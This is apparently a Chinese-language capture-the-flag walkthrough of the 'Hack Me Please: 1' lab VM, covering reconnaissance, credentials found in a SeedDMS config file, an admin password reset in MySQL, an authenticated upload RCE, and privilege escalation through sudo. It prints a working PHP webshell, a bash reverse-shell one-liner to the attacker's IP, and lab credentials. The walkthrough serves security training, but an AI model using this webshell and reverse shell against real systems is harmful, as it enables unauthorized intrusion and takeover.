红队打靶练习:HACK ME PLEASE: 1-编程知识

信息收集

1、arp

┌──(root㉿ru)-[~/kali]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:69:c7:bf, IPv4: 192.168.61.128
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.61.2    00:50:56:f0:df:20       VMware, Inc.
192.168.61.130  00:50:56:33:a0:24       VMware, Inc.
192.168.61.254  00:50:56:ee:60:ec       VMware, Inc.
192.168.61.1    00:50:56:c0:00:08       VMware, Inc.197 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.533 seconds (101.07 hosts/sec). 4 responded

2、nmap

端口探测┌──(root㉿ru)-[~/kali]
└─# nmap -p- 192.168.61.130 --min-rate 10000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-15 08:31 CST
Nmap scan report for 192.168.61.130
Host is up (0.00069s latency).
Not shown: 65532 closed tcp ports (reset)
PORT      STATE SERVICE
80/tcp    open  http
3306/tcp  open  mysql
33060/tcp open  mysqlx
MAC Address: 00:50:56:33:A0:24 (VMware)Nmap done: 1 IP address (1 host up) scanned in 6.03 seconds

time | ssl-cert: Subject: commonName=MySQL_Server_8

信息探测──(root㉿ru)-[~/kali]
└─# nmap -sCV -O -A -p 80,3306,33060 192.168.61.130 --min-rate 10000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-15 08:32 CST
Nmap scan report for 192.168.61.130
Host is up (0.00050s latency).PORT      STATE SERVICE VERSION
80/tcp    open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Welcome to the land of pwnland
3306/tcp  open  mysql   MySQL 8.0.25-0ubuntu0.20.04.1
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=MySQL_Server_8.0.25_Auto_Generated_Server_Certificate
| Not valid before: 2021-07-03T00:33:15
|_Not valid after:  2031-07-01T00:33:15
| mysql-info:
|   Protocol: 10
|   Version: 8.0.25-0ubuntu0.20.04.1
|   Thread ID: 40
|   Capabilities flags: 65535
|   Some Capabilities: Speaks41ProtocolNew, LongPassword, SwitchToSSLAfterHandshake, ODBCClient, InteractiveClient, IgnoreSigpipes, Support41Auth, DontAllowDatabaseTableColumn, Speaks41ProtocolOld, SupportsTransactions, LongColumnFlag, FoundRows, ConnectWithDatabase, IgnoreSpaceBeforeParenthesis, SupportsLoadDataLocal, SupportsCompression, SupportsMultipleResults, SupportsMultipleStatments, SupportsAuthPlugins
|   Status: Autocommit
|   Salt: &Z`x>zAF\x05>\x10l\x04h\x1C2\x1A*Je
|_  Auth Plugin Name: caching_sha2_password
33060/tcp open  mysqlx?
| fingerprint-strings:
|   DNSStatusRequestTCP, LDAPSearchReq, NotesRPC, SSLSessionReq, TLSSessionReq, X11Probe, afp:
|     Invalid message"
|     HY000
|   LDAPBindReq:
|     *Parse error unserializing protobuf message"
|     HY000
|   oracle-tns:
|     Invalid message-frame."
|_    HY000
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port33060-TCP:V=7.94SVN%I=7%D=2/15%Time=65CD5BA4%P=x86_64-pc-linux-gnu%
SF:r(NULL,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(GenericLines,9,"\x05\0\0\0\x
SF:0b\x08\x05\x1a\0")%r(GetRequest,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(HTT
SF:POptions,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(RTSPRequest,9,"\x05\0\0\0\
SF:x0b\x08\x05\x1a\0")%r(RPCCheck,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(DNSV
SF:ersionBindReqTCP,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(DNSStatusRequestTC
SF:P,2B,"\x05\0\0\0\x0b\x08\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x
SF:0fInvalid\x20message\"\x05HY000")%r(Help,9,"\x05\0\0\0\x0b\x08\x05\x1a\
SF:0")%r(SSLSessionReq,2B,"\x05\0\0\0\x0b\x08\x05\x1a\0\x1e\0\0\0\x01\x08\
SF:x01\x10\x88'\x1a\x0fInvalid\x20message\"\x05HY000")%r(TerminalServerCoo
SF:kie,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(TLSSessionReq,2B,"\x05\0\0\0\x0
SF:b\x08\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20messag
SF:e\"\x05HY000")%r(Kerberos,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(SMBProgNe
SF:g,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(X11Probe,2B,"\x05\0\0\0\x0b\x08\x
SF:05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message\"\x05
SF:HY000")%r(FourOhFourRequest,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(LPDStri
SF:ng,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(LDAPSearchReq,2B,"\x05\0\0\0\x0b
SF:\x08\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message
SF:\"\x05HY000")%r(LDAPBindReq,46,"\x05\0\0\0\x0b\x08\x05\x1a\x009\0\0\0\x
SF:01\x08\x01\x10\x88'\x1a\*Parse\x20error\x20unserializing\x20protobuf\x2
SF:0message\"\x05HY000")%r(SIPOptions,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(
SF:LANDesk-RC,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(TerminalServer,9,"\x05\0
SF:\0\0\x0b\x08\x05\x1a\0")%r(NCP,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(Note
SF:sRPC,2B,"\x05\0\0\0\x0b\x08\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1
SF:a\x0fInvalid\x20message\"\x05HY000")%r(JavaRMI,9,"\x05\0\0\0\x0b\x08\x0
SF:5\x1a\0")%r(WMSRequest,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(oracle-tns,3
SF:2,"\x05\0\0\0\x0b\x08\x05\x1a\0%\0\0\0\x01\x08\x01\x10\x88'\x1a\x16Inva
SF:lid\x20message-frame\.\"\x05HY000")%r(ms-sql-s,9,"\x05\0\0\0\x0b\x08\x0
SF:5\x1a\0")%r(afp,2B,"\x05\0\0\0\x0b\x08\x05\x1a\0\x1e\0\0\0\x01\x08\x01\
SF:x10\x88'\x1a\x0fInvalid\x20message\"\x05HY000");
MAC Address: 00:50:56:33:A0:24 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hopTRACEROUTE
HOP RTT     ADDRESS
1   0.50 ms 192.168.61.130OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.12 seconds

3、nikto

──(root㉿ru)-[~/kali]
└─# nikto -h http://192.168.61.130
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP:          192.168.61.130
+ Target Hostname:    192.168.61.130
+ Target Port:        80
+ Start Time:         2024-02-15 08:35:27 (GMT8)
---------------------------------------------------------------------------
+ Server: Apache/2.4.41 (Ubuntu)
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.41 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ /: Server may leak inodes via ETags, header found with file /, inode: 5cc0, size: 5c63607241df0, mtime: gzip. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1418
+ OPTIONS: Allowed HTTP Methods: POST, OPTIONS, HEAD, GET .
+ 8103 requests: 0 error(s) and 5 item(s) reported on remote host
+ End Time:           2024-02-15 08:35:56 (GMT8) (29 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

4、whatweb

┌──(root㉿ru)-[~/kali]
└─# whatweb -v http://192.168.61.130
WhatWeb report for http://192.168.61.130
Status    : 200 OK
Title     : Welcome to the land of pwnland
IP        : 192.168.61.130
Country   : RESERVED, ZZSummary   : Apache[2.4.41], Bootstrap, Frame, HTML5, HTTPServer[Ubuntu Linux][Apache/2.4.41 (Ubuntu)], JQuery[1.11.2], Modernizr[2.8.3-respond-1.4.2.min], Script[text/javascript], X-UA-Compatible[IE=edge]Detected Plugins:
[ Apache ]The Apache HTTP Server Project is an effort to develop andmaintain an open-source HTTP server for modern operatingsystems including UNIX and Windows NT. The goal of thisproject is to provide a secure, efficient and extensibleserver that provides HTTP services in sync with the currentHTTP standards.Version      : 2.4.41 (from HTTP Server Header)Google Dorks: (3)Website     : http://httpd.apache.org/[ Bootstrap ]Bootstrap is an open source toolkit for developing withHTML, CSS, and JS.Website     : https://getbootstrap.com/[ Frame ]This plugin detects instances of frame and iframe HTMLelements.[ HTML5 ]HTML version 5, detected by the doctype declaration[ HTTPServer ]HTTP server header string. This plugin also attempts toidentify the operating system from the server header.OS           : Ubuntu LinuxString       : Apache/2.4.41 (Ubuntu) (from server string)[ JQuery ]A fast, concise, JavaScript that simplifies how to traverseHTML documents, handle events, perform animations, and addAJAX.Version      : 1.11.2Version      : 1.11.2Website     : http://jquery.com/[ Modernizr ]Modernizr adds classes to the <html> element which allowyou to target specific browser functionality in yourstylesheet. You don't actually need to write any Javascriptto use it. [JavaScript]Version      : 2.8.3-respond-1.4.2.minWebsite     : http://www.modernizr.com/[ Script ]This plugin detects instances of script HTML elements andreturns the script language/type.String       : text/javascript[ X-UA-Compatible ]This plugin retrieves the X-UA-Compatible value from theHTTP header and meta http-equiv tag. - More Info:http://msdn.microsoft.com/en-us/library/cc817574.aspxString       : IE=edgeHTTP Headers:HTTP/1.1 200 OKDate: Thu, 15 Feb 2024 00:36:06 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Sat, 03 Jul 2021 11:03:53 GMTETag: "5cc0-5c63607241df0-gzip"Accept-Ranges: bytesVary: Accept-EncodingContent-Encoding: gzipContent-Length: 3776Connection: closeContent-Type: text/html

目录扫描

1、gobuster

──(root㉿ru)-[~/kali]
└─# gobuster dir -u http://192.168.61.130/ -x php,txt,html -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.61.130/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,txt,html
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.html                (Status: 403) [Size: 279]
/index.html           (Status: 200) [Size: 23744]
/.php                 (Status: 403) [Size: 279]
/img                  (Status: 301) [Size: 314] [--> http://192.168.61.130/img/]
/css                  (Status: 301) [Size: 314] [--> http://192.168.61.130/css/]
/js                   (Status: 301) [Size: 313] [--> http://192.168.61.130/js/]
/fonts                (Status: 301) [Size: 316] [--> http://192.168.61.130/fonts/]
/.html                (Status: 403) [Size: 279]
/.php                 (Status: 403) [Size: 279]
/server-status        (Status: 403) [Size: 279]
Progress: 882244 / 882248 (100.00%)
===============================================================
Finished
===============================================================

2、dirsearch

┌──(root㉿ru)-[~/kali]
└─# dirsearch -u http://192.168.61.130 -e* -x 403
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.htmlfrom pkg_resources import DistributionNotFound, VersionConflict_|. _ _  _  _  _ _|_    v0.4.3(_||| _) (/_(_|| (_| )Extensions: php, jsp, asp, aspx, do, action, cgi, html, htm, js, tar.gz | HTTP method: GET | Threads: 25 | Wordlist size: 14594Output File: /root/kali/reports/http_192.168.61.130/_24-02-15_08-37-35.txtTarget: http://192.168.61.130/[08:37:35] Starting:
[08:37:35] 301 -  313B  - /js  ->  http://192.168.61.130/js/
[08:38:08] 301 -  314B  - /css  ->  http://192.168.61.130/css/
[08:38:14] 301 -  316B  - /fonts  ->  http://192.168.61.130/fonts/
[08:38:17] 301 -  314B  - /img  ->  http://192.168.61.130/img/Task Completed

WEB

信息收集

经过信息收集，根本没啥线索！在我看源码的时候，发现几个js链接！

经过几波周折，发现最后是一个登录框！

MySQL登录

我们需要先找到登录密码！

┌──(root㉿ru)-[~/kali]
└─# gobuster dir -u http://192.168.61.130/seeddms51x/ -x php,txt,html -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.61.130/seeddms51x/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              html,php,txt
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.php                 (Status: 403) [Size: 279]
/.html                (Status: 403) [Size: 279]
/data                 (Status: 301) [Size: 326] [--> http://192.168.61.130/seeddms51x/data/]
/www                  (Status: 301) [Size: 325] [--> http://192.168.61.130/seeddms51x/www/]
/conf                 (Status: 301) [Size: 326] [--> http://192.168.61.130/seeddms51x/conf/]

conf目录！继续爆破！！

┌──(root㉿ru)-[~/kali]
└─# gobuster dir -u http://192.168.61.130/seeddms51x/conf/ -x php,txt,html -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.61.130/seeddms51x/conf/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,txt,html
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.php                 (Status: 403) [Size: 279]
/.html                (Status: 403) [Size: 279]
/settings.xml         (Status: 200) [Size: 12377]

mysql的账号以及密码：seeddms:seeddms

在数据库seeddms里面找到users表以及tblUser表，然后可以得到账号密码！

admin:f9ef2c539bad8a6d2f3432b6d49ab51a(md5加密了)saurav：Saket@#$1337我也懒得爆破了，我们直接更新admin的密码得了！！

UPDATE tblUsers set pwd='21232f297a57a5a743894a0e4a801fc3' where login='admin';21232f297a57a5a743894a0e4a801fc3 : admin

cms登录

┌──(root㉿ru)-[~/kali]
└─# searchsploit SeedDMS
----------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------Exploit Title                                                                                                                                                   |  Path
----------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Seeddms 5.1.10 - Remote Command Execution (RCE) (Authenticated)                                                                                                  | php/webapps/50062.py
SeedDMS 5.1.18 - Persistent Cross-Site Scripting                                                                                                                 | php/webapps/48324.txt
SeedDMS < 5.1.11 - 'out.GroupMgr.php' Cross-Site Scripting                                                                                                       | php/webapps/47024.txt
SeedDMS < 5.1.11 - 'out.UsrMgr.php' Cross-Site Scripting                                                                                                         | php/webapps/47023.txt
SeedDMS versions < 5.1.11 - Remote Command Execution                                                                                                             | php/webapps/47022.txt
----------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

存在漏洞！存在几个rce漏洞！！

rce漏洞！！┌──(root㉿ru)-[~/kali]
└─# cat 47022.txt
# Exploit Title: [Remote Command Execution through Unvalidated File Upload in SeedDMS versions <5.1.11]
# Google Dork: [NA]
# Date: [20-June-2019]
# Exploit Author: [Nimit Jain](https://www.linkedin.com/in/nimitiitk)(https://secfolks.blogspot.com)
# Vendor Homepage: [https://www.seeddms.org]
# Software Link: [https://sourceforge.net/projects/seeddms/files/]
# Version: [SeedDMS versions <5.1.11] (REQUIRED)
# Tested on: [NA]
# CVE : [CVE-2019-12744]Exploit Steps:Step 1: Login to the application and under any folder add a document.
Step 2: Choose the document as a simple php backdoor file or any backdoor/webshell could be used.PHP Backdoor Code:
<?phpif(isset($_REQUEST['cmd'])){echo "<pre>";$cmd = ($_REQUEST['cmd']);system($cmd);echo "</pre>";die;
}?>Step 3: Now after uploading the file check the document id corresponding to the document.
Step 4: Now go to example.com/data/1048576/"document_id"/1.php?cmd=cat+/etc/passwd to get the command response in browser.Note: Here "data" and "1048576" are default folders where the uploaded files are getting saved.

我们只需要在这里上传反弹shell文件即可！

根据提示，我们访问http://192.168.61.130/seeddms51x/data/1048576/6/1.php

成功执行命令！！

反弹shell

payload/bin/bash -c 'bash -i >&/dev/tcp/192.168.61.128/1234 0>&1'

提权

系统信息收集

python3 -c 'import pty;pty.spawn("/bin/bash")'export TERM=xterm提高交互性

www-data@ubuntu:/home$ cat /etc/passwd | grep "/home" | grep -v nologin
cat /etc/passwd | grep "/home" | grep -v nologin
saket:x:1000:1000:Ubuntu_CTF,,,:/home/saket:/bin/bash

横向渗透

密码我们在数据库那就可以得到！！

sudo提权

saket@ubuntu:~$ sudo -l
sudo -l
[sudo] password for saket:Sorry, try again.
[sudo] password for saket: Saket@#$1337Matching Defaults entries for saket on ubuntu:env_reset, mail_badpass,secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/binUser saket may run the following commands on ubuntu:(ALL : ALL) ALL
saket@ubuntu:~$ sudo su
sudo su
root@ubuntu:/home/saket# id
id
uid=0(root) gid=0(root) groups=0(root)
root@ubuntu:/home/saket#